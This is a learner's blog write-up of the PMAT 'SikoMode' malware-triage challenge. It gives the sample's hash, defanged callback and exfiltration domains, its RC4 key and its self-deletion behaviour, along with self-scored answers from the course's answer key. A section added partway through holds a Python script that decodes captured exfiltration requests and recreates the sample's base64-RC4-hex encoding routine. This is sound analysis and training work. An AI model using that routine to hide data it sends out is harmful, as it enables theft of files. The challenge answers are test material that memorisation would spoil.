Note: This challenge write-up is a “blind analysis”, which was written prior to viewing the answer section of this course. I include how I answered questions, if I got it right or wrong, and why as a reflection for further learning. (Contains spoilers!)

Practical Malware Analysis and Triage “Siko Mode” Challenge

This write-up comes from the PMAT course produced by Husky Hacks. At the time of writing, I am about 3/4 of the way through the course and have found it very valuable from a SOC analyst perspective. It has given me a newfound interest in malware research that I will continue to pursue in the future.

The course is available here for a $30 monthly subscription (TCM Academy All Access Pass):

https://academy.tcm-sec.com/p/the-all-access-pass?affcode=770707_o6lvcuwx (Affiliate Link)

This is the second challenge in the series and covers basic static/dynamic analysis as well as advanced static/dynamic analysis. The first challenge, “Silly Putty”, covers only basic static/dynamic analysis; see the write-up here: http://cybersec.reviews/write-ups/pmatsillyputty/

For this challenge I gave myself a time constraint (partially due to the lack of free time) of 4 hours. I spent 30 minutes on basic static analysis, 1 hour on dynamic analysis, and the rest on advanced static/dynamic analysis.

Challenge Intro

Viewing the provided GitHub repository (https://github.com/HuskyHacks/PMAT-labs/tree/main/labs/2-3.Challenge-SikoMode) gives the following scenario:

“Analyst,

This specimen came from a poor decision and a link that should not have been clicked on. No surprises there. We need to figure out the extent of what this thing can do. It looks a little advanced.

Perform a full analysis and send us the report when done. We need to go in depth on this one to determine what it is doing, so break out your decompiler and debugger and get to work!”

These challenges include a list of questions that I will attempt to answer throughout the analysis, and I also self-score my answers.

Basic Static Analysis

Hash

I first started basic static analysis by generating a hash of the binary [unknown.exe], which is [6c8f50040545d8cd9af4b51564de654266e592e3]. According to VirusTotal at the time of writing, the sample has a threat score of 41/71 vendors and is C++ compiled. This information might be enough to answer the first question, but I wanted to investigate further.

Strings

Next, I pulled strings via the floss command in FLARE VM. I did not see many interesting strings other than a reference to a file that is provided by the course, @Desktop\cosmo.jpeg.

PE View

Opening the binary in PEview, I observed the following information:

The compilation timestamp is [August 1st 2022]. The .text section header has a virtual size of [18818] and a raw size of [18A00]. This equates to [304030] bytes and [305000] bytes, which does not indicate packing. This is further supported by the absence of packer-related section headers. Attempting to view the Import Address Table of the binary failed in PEStudio and PEview; the most I was able to see is that the following DLLs are used: [Kernel32.dll] (TerminateProcess, VirtualAlloc), [Msvcrt.dll] (malloc), and [User32.dll] (MessageBoxA). According to “malapi.io” the only interesting functions were TerminateProcess and VirtualAlloc. TerminateProcess, as the name implies, is used to terminate a process, and according to “malapi.io” VirtualAlloc “is often used by malware to allocate memory as part of process injection”. This indicates that the sample could have process injection capabilities; this was not fully concluded, but it was kept in mind during further analysis.

Dynamic Analysis

No Internet Simulation

First, I executed the binary without INetSim enabled to observe any behavior differences. During execution, no attempted connections were observed in Wireshark and no processes were spawned; after about 10 seconds the file deleted itself. I also used the tool “Regshot” to take a snapshot of the registry hive before and after execution to observe any changes (the tool is available here: https://github.com/Seabreg/Regshot).

Registry Changes

Key : Value Deletion

[Explorer\SessionInfo\1\ApplicationViewManagement] : [VirtualDesktop: 10 00 00 00 30 30 44 56 57 8C 87 23 3F 24 04 4F 9F A5 87 15 32 AC FE 42]

Key : Value Added

[Explorer\UserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\Unlqra\Qrfxgbc\haxabja.rk] : [0 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF FF FF FF FF 40 AE 62 E5 88 D4 D8 01 00 00 00 00]

[SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Users\User\Desktop\unknown.exe] : [53 41 43 50 01 00 00 00 00 00 00 00 07 00 00 00 28 00 00 00 8B 89 08 00 E1 06 09 00 01 00 00 00 00 00 00 00 00 00 00 0A 73 20 00 00 50 BB 64 ED DD AC D5 01 00 00 00 00 00 00 00 00 02 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7D 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00]

Key : Value Modified

[Multimedia\Audio\Journal\Render] : [CurrentVersion\Schedule\TaskCache\Tasks]

Files Created

System32\rasadhlp.dll

System32\dnsapi.dll

Files Deleted

The only file that was deleted was the sample itself [unknown.exe]

With this information I attempted to answer 1 of the 13 challenge questions.

Challenge Question: Does the binary persist? If so, how?

-My Answer: The binary appears to persist by adding the two keys above which appear to contain hex or shellcode.

-Self Score: Incorrect, the answer is “There is no persistence mechanism used by this malware.”

Internet Simulation

Next, I executed the binary with INetSim running on my REMnux virtual machine, which is in the same host-only network as my FLARE VM. I noticed that the file did not delete itself this time and that no child processes were spawned. Using TCPView, I saw that the sample opens local ports [1077-1277] to destination port [80]. The sample continually opens local ports and waits for responses. Terminating the process kills all listening ports, and the file does not delete itself.

Using Wireshark on the REMnux machine, I noticed the sample establishes TCP connections with a full handshake (SYN, SYN-ACK, ACK) and then makes a GET request to [hxxp://update.ec12-4-109-278-3-ubuntu20-04[.]local/]. Next, I saw the sample make a DNS query to [Cdn[.]altimiter[.]local] and then finally a GET request to the CDN: [GET /feed?post=A8E437E8F0367592569A2870BBDD382A1DFBB01A15FC23999D7788C33502AD9256E481B402BDC6BC25167B6478F204C49A9BADD68C4AC2A617437ECCBBA9 HTTP/1.1\r\n]. The GET request could be the exfiltration mechanism; however, attempting to decode it fails. When the process is terminated, it sends a TCP reset flag to the previous outbound connections, which terminates all TCP connections.

Lastly, I executed the binary with INetSim running and then terminated INetSim. I noticed that when INetSim is turned off, the process [unknown.exe] exits and then deletes itself, similar to what I observed earlier. The process retransmits each connection and then sends a reset flag; once all connections are closed, it deletes itself. With this information I was able to answer 6 out of the 13 challenge questions.

Challenge Question: Under what conditions can you get the binary to delete itself?

-My Answer: The binary deletes itself when no outbound connections are available or when it loses connection

-Self Score: Correct, I only did not observe that the binary will delete itself “after finishing it’s exfiltration routine”.

Challenge Question: What is the first callback domain?

-My Answer: The first callback domain appears to be [hxxp://update.ec12-4-109-278-3-ubuntu20-04[.]local/]

-Self Score: Correct

Challenge Question: Under what conditions can you get the binary to exfiltrate data?

-My Answer: If the binary can contact the first domain [hxxp://update.ec12-4-109-278-3-ubuntu20-04[.]local/]

-Self Score: Half correct. According to the challenge answers, the following occurs if the initial domain is contacted: “After a successful check in with this domain, the sample unpacks the passwrd.txt file into C:\Users\Public, opens a handle to cosmo.jpeg, base64 encodes the contents of the file, and begins the data encryption routine.”

Challenge Question: What is the exfiltration domain?

-My Answer: [Cdn[.]altimiter[.]local]

-Self Score: Correct

Challenge Question: What URI is used to exfiltrate data?

-My Answer: GET /feed?post=*Data*

-Self Score: Correct

Advanced Static and Dynamic Analysis

For the static analysis section, I used the tool Cutter, which was the tool used for demonstration in the prior sections. This was only my 3rd time attempting to read assembly (this course, a crack me challenge, and this challenge) and the 2nd time using a disassembler (a crack me challenge and this challenge). I first struggled trying to figure out the layout of the assembly, such as finding the main function. After struggling with only using Cutter, I then opened the binary in the x32dbg debugger to use the two tools together. I followed the execution in the debugger until it reached a function called “siko”. With this find I was able to observe other functions in Cutter that appeared to be more interesting.

I then noticed there was a call to [RC4….] in the assembly; this made me think that the exfiltrated data was encrypted with RC4, since I had not been able to decode it.

After struggling through assembly in Cutter and halfway figuring out how to use the debugger for the last of my 4-hour allotted time, it was time to call it quits and see if I had gathered enough information to answer the last few questions.

Challenge Question: What language is the binary written in?

-My Answer: C++ according to VirusTotal, or C according to Cutter

-Self Score: Incorrect. The binary is written in Nim and according to the answer document, this could have been observed via the strings output of the Nim Libraries being referenced.

Challenge Question: What is the architecture of this binary?

-My Answer: X86

-Self Score: Correct

Challenge Question: How does exfiltration take place?

-My Answer: In the GET request with the post parameter

-Self Score: This question was not included in the answer document for reference, but I’m going to call it correct since I’m a noob at this.

Challenge Question: What type of data is exfiltrated (the file is cosmo.jpeg, but how exactly is the file’s data transmitted?)

-My Answer: Over HTTP GET with the data being encrypted

-Self Score: Incorrect. The correct answer is “The file data from cosmo.jpeg is read in by the malware, then encrypted using the contents of passwrd.txt as the key”.

Challenge Question: What kind of encryption algorithm is in use?

-My Answer: RC4

-Self Score: Correct! I was surprised I got this one right, especially identifying it in the assembly. According to the answer document, this was the harder way to figure it out; it could also have been observed in the imported libraries, which I did not see.

Challenge Question: What key is used to encrypt the data?

-My Answer: genKeystream__OOZOOZOOZOOZOOZOnimbleZpkgsZ8267524548O49O48Z826752_

-Self Score: Incorrect. According to the answer document “The key is the contents of passwrd.txt, which is the text SikoMode”
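Putting the answers above together (base64 encoding of cosmo.jpeg, RC4 with the contents of passwrd.txt as the key, and the hex payload in the GET /feed?post= parameter), the following is an added example of how an analyst could decode captured exfiltration traffic. It is not code from the course or from the sample; it assumes that order of operations, that the hex in the post parameter is the RC4 output, and that each request carries an independently encrypted chunk. The captured request lines are constructed here, not the ones observed in the write-up.

```python
# Added example (not the PMAT course's or the sample's own code): rebuild a file from
# captured "GET /feed?post=<hex>" requests. Assumed pipeline: base64 -> RC4("SikoMode")
# -> hex, with a fresh keystream per request. Traffic below is constructed test data.
import base64
from urllib.parse import urlparse, parse_qs

KEY = b"SikoMode"  # contents of passwrd.txt, per the challenge answer key

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA) XORed over data; symmetric, so it decrypts as well."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def post_param(request_line: str) -> str:
    """Extract the hex payload from a captured 'GET /feed?post=... HTTP/1.1' line."""
    path = request_line.split()[1]
    return parse_qs(urlparse(path).query)["post"][0]

def decode_exfil(request_lines, key=KEY) -> bytes:
    """RC4-decrypt every chunk, join the base64 pieces, and decode to the file bytes."""
    b64 = b"".join(rc4(key, bytes.fromhex(post_param(line))) for line in request_lines)
    return base64.b64decode(b64)

def build_requests(file_bytes: bytes, key=KEY, chunk=64):
    """Constructed stand-in for the exfil routine, used only to produce test traffic."""
    b64 = base64.b64encode(file_bytes)
    return [f"GET /feed?post={rc4(key, b64[i:i + chunk]).hex().upper()} HTTP/1.1"
            for i in range(0, len(b64), chunk)]

# Constructed stand-in for cosmo.jpeg: JPEG SOI/APP0 marker bytes plus filler, then EOI.
SAMPLE_FILE = b"\xff\xd8\xff\xe0" + bytes(range(256)) * 2 + b"\xff\xd9"
CAPTURED = build_requests(SAMPLE_FILE)

if __name__ == "__main__":
    recovered = decode_exfil(CAPTURED)
    print(len(CAPTURED), "requests, recovered", len(recovered),
          "bytes, matches original:", recovered == SAMPLE_FILE)
```

The same decode_exfil function can be pointed at real request lines pulled from a pcap once the key and encoding order have been confirmed in the disassembly.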

Challenge Question: What is the significance of houdini?

-My Answer: This was the function that causes the binary to delete itself called “houdini_sikomode_51”

-Self Score: Correct.

My Takeaways

I was proud of myself for getting 8.5 out of the 13 questions on this challenge, especially since it was my first real exposure to reverse engineering a malware sample. I did have a few takeaways from this challenge that I am keeping in mind for future learning:

  1. Practice coding in C/C++ and Assembly. I think being able to write and think more like a programmer would help with my reverse engineering skills. At the time of writing, I have only been exposed to C through Codecademy lessons and to Assembly only through this course. I added a few C and Assembly courses to my “study list” that I am hoping will help with my malware analysis and reverse engineering skills.
  2. Practice reverse engineering through RE challenges. I have done a crack me RE challenge with a friend while taking this course and enjoyed it very much. After practicing coding, I plan on doing more RE challenges to strengthen this skill itself.
  3. Try to figure out the sample’s “behavior”. While writing this blog post I noticed I did not look into how the sample itself operates. I should have asked further questions such as “How is it exfiltrating data?” or “What is being exfiltrated?” and looked into that. I’m sure this will come with time as I continue my studies.
  4. Malware analysis and reverse engineering is fascinating. I really have been enjoying this course and taking apart samples. I have always enjoyed taking things apart to see how they work and then putting them back together such as mechanical wrist watches or engines. I plan on focusing on this area for future self-studying and doing more courses and challenges. If you have any malware analysis or reverse engineering resources you would suggest, please feel free to reach out to me via Twitter or Instagram below.
  5. Take screenshots. Throughout the analysis I forgot to take screenshots for this challenge; in the future I will have to remember to take the time to use screenshots to document the analysis.
  6. Google things I do not know from strings output. This caused me to miss the question about what language the binary was written in.